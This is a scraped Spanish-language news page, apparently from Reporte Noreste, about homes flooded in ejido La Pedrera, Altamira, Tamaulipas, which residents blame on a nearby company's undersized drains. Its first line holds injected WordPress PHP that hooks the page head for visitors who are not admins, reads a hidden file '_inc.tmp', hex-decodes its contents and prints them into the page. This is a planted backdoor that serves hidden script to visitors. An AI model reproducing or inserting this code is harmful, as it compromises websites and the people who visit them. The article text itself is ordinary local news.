if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Residentes del ejido La Pedrera se les mete el agua a sus casas – Reporte Noreste
Conéctate con nosotros

Sur de Tamaulipas

Residentes del ejido La Pedrera se les mete el agua a sus casas

Residentes del ejido La Pedrera se les mete el agua a sus casas

Altamira, Tamaulipas.- Residentes del ejido La Pedrera en este municipio sufrieron pérdidas económicas por una inundación que llegó hasta el interior de sus casas, esto durante la madrugada en que se presentó una fuerte tormenta en la zona sur de Tamaulipas.

Los más afectados fueron los residentes de cuatro casas que se ubican en las calles Hidalgo y Francisco I. Madero, de este lugar, en donde el agua alcanzó casi medio metro.

Al lugar acudieron elementos de Protección Civil, para brindar ayuda a las personas, además de llevar maquinaria para dispersar el agua.

Los afectados refirieron que estas inundaciones se volvieron periódicas cada que llueve después de la construcción de una empresa que se instaló cerca del lugar y que rellenó el terreno, construyendo sus desagües.

Sin embargo los tubos que pusieron para sacar el agua son muy pequeños por lo que a cualquier lluvia se tapan provocando la inundación.

El titular de Protección Civil, comentó que sostendrá una reunión con los directivos de la empresa para buscar la manera de ampliar dichos desagües y no afecte más a la población de ese lugar.

Inició carrera en medios en 1996. Ha participado como reportero en medios impresos y electrónicos conductor de noticias en radio y televisión.

Haga clic para comentar

Leave a Reply

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Facebook

Principales

Más en Sur de Tamaulipas